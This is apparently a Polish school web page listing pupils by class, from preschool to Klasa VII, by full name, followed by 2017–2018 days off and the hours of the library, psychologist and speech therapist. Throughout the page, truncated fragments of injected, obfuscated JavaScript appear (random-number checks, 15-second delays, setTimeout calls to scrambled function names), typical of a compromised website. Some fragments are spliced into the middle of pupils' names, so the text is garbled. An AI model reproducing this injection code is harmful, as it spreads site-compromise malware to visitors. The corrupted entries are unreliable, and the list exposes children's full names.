Uczniowie

Oddział przedszkolny
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Górecka Oliwia
2. Jęczarek Aleksdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andra
3. Karolewski Bartosz
4. Karwowska Gabriela
5. Krempic Jakub
6. Krempic Oliwia
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
7. Krysztoforski Szymon
8. Lewdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andowicz Filip
9. Mirzejewska Julia
10. Ostrowski Michał
11. Podgórska julia
12. Przybył Filip

Klasa I
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Dąbrowski Szymon
2. Gabrychowicz Lena
3. Karwowski Julian
4. Kleczkowska Wiktoria
5. Kowalski Alan
6. Krempic Bartosz
7. Krysztoforska Ewa
8. Lewdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andowicz Dominik
9. Olszewska Ewelina
10. Pełczyński Gracjan
11. Rakowski Gabriel
12. Rama Dominik
13. Szmejter Lena

Klasa II
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Kęsicki Kacper
2. Krysztoforski Adam
3. Malanowska Amelia
4. Ostrowski Ksawery
5. Pełczyński Sebastian
6. Piankowska Maja
7. Stefańska Lena
8. Wojciechowski Jakub

Klasa IIIdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Baczewski Kacper
2. Brzezińska Nikola
3. Chrześcijańska Gabriela
4. Cieszkowska Patrycja
5. Gabrychowicz Ewelina
6. Janiszewska Zuzanna
7. Karolewski Szymon
8. Lejman Maja
9. Lewińska Martyna
10. Łuczak Jakub
11. Okońska Gabriela
12. Olszewska Zofia
13. Ostrowska Gabriela
14. Piankowski Szymon
15. Wojciechowska Weronika
16. Wojciechowski Kacper

Klasa IVdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Gabrychowicz Piotr
2. Jankowski Jakub
3. Kilanowski Hubert
4. Krempic Paweł
5. Lewińska Zuzanna
6. Mirzejewski Kacper
7. Pociask Adrian
8. Przybył Dominik
9. Przybył Sdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andra
10. Rybkiewicz Paweł
11. Staniszewska Nikola

Klasa V
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Czapliński Adam
2. Grzelak Magdalena
3. Jęczarek Martyna
4. Klana Jakub
5. Lejman Natalia
6. Łuczak Mikołaj
7. Okońska Zuzanna
8. Ostrowski Bartłomiej
9. Piankowski Mikołaj
10. Rama Mateusz
11. Taborek Nikola
12. Żołnowska Natalia

Klasa VI
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Czajkowska Kamila
2. Jankowski Kacper
3. Kozłowski Michał
4. Kuligowska Oliwia
5. Rakowska Patrycja
6. Rybkiewicz Dawid
7. Olszewska Dominika
8. Taborek Karolina
9. Żołnowski Jakub

Klasa VII
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
1. Jaglińska Andżelika
2. Kacprzak Dominik
3. Karolewski Piotr
4. Kozłowska Kinga
5. Menc Natalia
6. Okońska Kinga
7. Topolewska Michalina
8. Wiączek Damian

 

 

 

Dni wolne

2 listopada 2017
3 listopada 2017
21 grudnia 2017
22 grudnia 2017
30 kwietnia 2018
2 maja 2018
4 maja 2018
1 czerwca 2018

Biblioteka szkolna

Poniedziałek 13.15 – 14.15
Środa 12.45 – 13.45

Psycholog

Środa 7.30 – 10.30

Logopeda

Wtorek 7.30 – 8.00
13.30 – 14.30
Środa 13.00 – 13.30